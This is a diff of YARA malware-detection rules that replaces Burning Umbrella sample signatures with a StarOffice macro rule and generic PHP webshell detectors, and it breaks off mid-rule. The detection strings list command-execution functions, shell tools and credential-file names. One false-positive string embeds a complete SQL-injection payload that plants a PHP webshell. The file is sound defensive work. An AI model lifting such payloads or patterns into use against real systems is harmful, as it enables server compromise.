-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L13-L31"
+		description = "Suspicious macro in StarOffice"
+		author = "John Lambert @JohnLaTwC"
+		id = "92110a87-66b4-5fc5-b3f5-3e59ec2671b2"
+		date = "2019-02-06"
+		modified = "2021-05-27"
+		reference = "https://twitter.com/JohnLaTwC/status/1093259873993732096"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_macro_staroffice_suspicious.yar#L1-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8ed432fea930eb9b4d695a4a68b833f4324fe0bbea3f0ccac2fe5934bfa1c22"
-		score = 75
-		quality = 85
+		logic_hash = "49385335488fa0a598ed48203d9483c5c2f53ae287e003a8cf7d64d56280e62a"
+		score = 60
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fcfe8fcf054bd8b19226d592617425e320e4a5bb4798807d6f067c39dfc6d1ff"
+		hash1 = "8495d37825dab8744f7d2c8049fc6b70b1777b9184f0abe69ce314795480ce39"
+		hash2 = "25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe"
+		hash3 = "322f314102f67a16587ab48a0f75dfaf27e4b044ffdc3b88578351c05b4f39db"
+		hash4 = "705429725437f7e0087a6159708df97992abaadff0fa48fdf25111d34a3e2f20"
+		hash5 = "7141d94e827d3b24810813d6b2e3fb851da0ee2958ef347154bc28153b23874a"
+		hash6 = "7c0e85c0a4d96080ca341d3496743f0f113b17613660812d40413be6d453eab4"
+		hash7 = "8d59f1e2abcab9efb7f833d478d1d1390e7456092f858b656ee0024daf3d1aa3"
+		hash8 = "9846b942d9d1e276c95361180e9326593ea46d3abcce9c116c204954bbfe3fdc"
+		hash9 = "aa0c83f339c8c16ad21dec41e4605d4e327adbbb78827dcad250ed64d2ceef1c"
+		hash10 = "b0be54c7210b06e60112a119c235e23c9edbe40b1c1ce1877534234f82b6b302"
+		hash11 = "bf581ebb96b8ca4f254ab4d200f9a053aff8187715573d9a1cbd443df0f554e3"
+		hash12 = "de45634064af31cb6768e4912cac284a76a6e66d398993df1aeee8ce26e0733b"
 
 	strings:
-		$s1 = { 40 00 00 E0 75 68 66 61 6F 68 6C 79 }
-		$s2 = { 40 00 00 E0 64 6A 7A 66 63 6D 77 62 }
+		$r1 = "StarBasic"
+		$r2 = "</script:module>"
+		$s1 = "Shell" nocase
+		$s2 = ".Run" nocase
+		$s3 = ".PutInClipboard" nocase
+		$s4 = "powershell" nocase
+		$fp1 = "LibreOffice project" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) )
+		filesize < 1MB and uint32be( 0 ) == 0x3c3f786d and all of ( $r* ) and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "926b4a29-ce47-559b-94e3-1fabd90f3fbe"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L33-L51"
+		description = "php webshell having some kind of input and some kind of payload. restricted to small files or big ones including suspicious strings"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "294ce5d5-55b2-5c79-b0f8-b66f949efbb2"
+		date = "2021-01-14"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L83-L411"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c298176e5849b2b202089f27cffb7646243d19a90898bbf079a97d2f624a27e"
-		score = 75
-		quality = 85
+		hash = "bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd"
+		hash = "6bf351900a408120bee3fc6ea39905c6a35fe6efcf35d0a783ee92062e63a854"
+		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
+		hash = "00813155bf7f5eb441e1619616a5f6b21ae31afc99caa000c4aafd54b46c3597"
+		hash = "e31788042d9cdeffcb279533b5a7359b3beb1144f39bacdd3acdef6e9b4aff25"
+		hash = "36b91575a08cf40d4782e5aebcec2894144f1e236a102edda2416bc75cbac8dd"
+		hash = "a34154af7c0d7157285cfa498734cfb77662edadb1a10892eb7f7e2fb5e2486c"
+		hash = "791a882af2cea0aa8b8379791b401bebc235296858266ddb7f881c8923b7ea61"
+		hash = "9a8ab3c225076a26309230d7eac7681f85b271d2db22bf5a190adbf66faca2e6"
+		hash = "0d3ee83adc9ebf8fb1a8c449eed5547ee5e67e9a416cce25592e80963198ae23"
+		hash = "3d8708609562a27634df5094713154d8ca784dbe89738e63951e12184ff07ad6"
+		hash = "70d64d987f0d9ab46514abcc868505d95dbf458387f858b0d7580e4ee8573786"
+		hash = "259b3828694b4d256764d7d01b0f0f36ca0526d5ee75e134c6a754d2ab0d1caa"
+		hash = "04d139b48d59fa2ef24fb9347b74fa317cb05bd8b7389aeb0a4d458c49ea7540"
+		hash = "58d0e2ff61301fe0c176b51430850239d3278c7caf56310d202e0cdbdde9ac3f"
+		hash = "731f36a08b0e63c63b3a2a457667dfc34aa7ff3a2aee24e60a8d16b83ad44ce2"
+		hash = "e4ffd4ec67762fe00bb8bd9fbff78cffefdb96c16fe7551b5505d319a90fa18f"
+		hash = "fa00ee25bfb3908808a7c6e8b2423c681d7c52de2deb30cbaea2ee09a635b7d4"
+		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
+		hash = "e9423ad8e51895db0e8422750c61ef4897b3be4292b36dba67d42de99e714bff"
+		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
+		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
+		hash = "3de8c04bfdb24185a07f198464fcdd56bb643e1d08199a26acee51435ff0a99f"
+		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
+		hash = "a09dcf52da767815f29f66cb7b03f3d8c102da5cf7b69567928961c389eac11f"
+		hash = "d9ae762b011216e520ebe4b7abcac615c61318a8195601526cfa11bbc719a8f1"
+		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
+		logic_hash = "03c1963ec7a0409970baa98dc3a62f721c092b41d4026475a38b1ef466426b75"
+		score = 70
+		quality = -109
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "801a64a730fc8d80e17e59e93533c1455686ca778e6ba99cf6f1971a935eda4c"
+		importance = 70
 
 	strings:
-		$s1 = { 40 00 00 E0 63 68 72 6F 6D 67 75 78 }
-		$s2 = { 40 00 00 E0 77 62 68 75 74 66 6F 61 }
-		$s3 = "ActiveX Manager" wide
+		$wfp_tiny1 = "escapeshellarg" fullword
+		$wfp_tiny2 = "addslashes" fullword
+		$gfp_tiny3 = "include \"./common.php\";"
+		$gfp_tiny4 = "assert('FALSE');"
+		$gfp_tiny5 = "assert(false);"
+		$gfp_tiny6 = "assert(FALSE);"
+		$gfp_tiny7 = "assert('array_key_exists("
+		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
+		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
+		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
+		$gfp_tiny11 = "; This is the recommended, PHP 4-style version of the php.ini-dist file"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp8 = /\(\s?\$_HEADERS\s?[\)\[]/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$inp20 = "TSOP_" wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.{0,500}|e'" nocase wide ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus66 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_bit_sus75 = "uploaded" fullword wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "str_rot13" fullword wide ascii
+		$gif = { 47 49 46 38 }
+		$cmpayload1 = /\beval[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload2 = /\bexec[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload3 = /\bshell_exec[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload4 = /\bpassthru[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload5 = /\bsystem[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload6 = /\bpopen[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload7 = /\bproc_open[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload8 = /\bpcntl_exec[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload9 = /\bassert[\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cmpayload10 = /\bpreg_replace[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
+		$cmpayload11 = /\bpreg_filter[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
+		$cmpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cmpayload20 = /\bcreate_function[\t ]{0,500}\([^)]/ nocase wide ascii
+		$cmpayload21 = /\bReflectionFunction[\t ]{0,500}\([^)]/ nocase wide ascii
+		$fp1 = "# Some examples from obfuscated malware:" ascii
+		$fp2 = "{@see TFileUpload} for further details." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) and $s3
+		not ( any of ( $gfp_tiny* ) or 1 of ( $fp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( filesize < 1000 and not any of ( $wfp_tiny* ) ) or ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) and ( filesize > 5KB or not any of ( $wfp_tiny* ) ) ) or ( filesize < 500KB and ( 4 of ( $cmpayload* ) ) ) )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_3 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Callback : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b997822a-3f62-51b4-bd96-e780ffe60812"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L53-L66"
+		description = "php webshell having some kind of input and using a callback to execute the payload. restricted to small files or would give lots of false positives"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e33dba84-bbeb-5955-a81b-2d2c8637fb48"
+		date = "2021-01-14"
+		modified = "2023-09-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L413-L718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad39864eec58b1c655bd3d510faa314702d118cee845da55d189e7252174eafb"
-		score = 75
-		quality = 85
+		hash = "e98889690101b59260e871c49263314526f2093f"
+		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
+		hash = "81388c8cc99353cdb42572bb88df7d3bd70eefc748c2fa4224b6074aa8d7e6a2"
+		hash = "27d3bfabc283d851b0785199da8b1b0384afcb996fa9217687274dd56a7b5f49"
+		hash = "ee256d7cc3ceb2bf3a1934d553cdd36e3fbde62a02b20a1b748a74e85d4dbd33"
+		hash = "4adc6c5373c4db7b8ed1e7e6df10a3b2ce5e128818bb4162d502056677c6f54a"
+		hash = "1fe4c60ea3f32819a98b1725581ac912d0f90d497e63ad81ccf258aeec59fee3"
+		hash = "2967f38c26b131f00276bcc21227e54ee6a71881da1d27ec5157d83c4c9d4f51"
+		hash = "1ba02fb573a06d5274e30b2b05573305294497769414e964a097acb5c352fb92"
+		hash = "f4fe8e3b2c39090ca971a8e61194fdb83d76fadbbace4c5eb15e333df61ce2a4"
+		hash = "badda1053e169fea055f5edceae962e500842ad15a5d31968a0a89cf28d89e91"
+		hash = "0a29cf1716e67a7932e604c5d3df4b7f372561200c007f00131eef36f9a4a6a2"
+		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
+		hash = "de1ef827bcd3100a259f29730cb06f7878220a7c02cee0ebfc9090753d2237a8"
+		hash = "487e8c08e85774dfd1f5e744050c08eb7d01c6877f7d03d7963187748339e8c4"
+		logic_hash = "e12dec5252a816c10443fe0e0b40b0b9b4a187b32facd8e09e1f057801da25f9"
+		score = 60
+		quality = -103
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "92efbecc24fbb5690708926b6221b241b10bdfe3dd0375d663b051283d0de30f"
+		importance = 70
 
 	strings:
-		$s1 = "HKEY_CLASSES_ROOT\\Word.Document.8\\shell\\Open\\command" fullword ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$gfp_tiny3 = "include \"./common.php\";"
+		$gfp_tiny4 = "assert('FALSE');"
+		$gfp_tiny5 = "assert(false);"
+		$gfp_tiny6 = "assert(FALSE);"
+		$gfp_tiny7 = "assert('array_key_exists("
+		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
+		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
+		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
+		$inp1 = "php://input" wide ascii
+		$inp2 = /_GET\s?\[/ wide ascii
+		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
+		$inp4 = /_POST\s?\[/ wide ascii
+		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
+		$inp6 = /_REQUEST\s?\[/ wide ascii
+		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
+		$inp15 = "_SERVER['HTTP_" wide ascii
+		$inp16 = "_SERVER[\"HTTP_" wide ascii
+		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
+		$inp18 = "array_values($_SERVER)" wide ascii
+		$inp19 = /file_get_contents\("https?:\/\// wide ascii
+		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
+		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
+		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
+		$cfp3 = "<?phpclass WPML" ascii
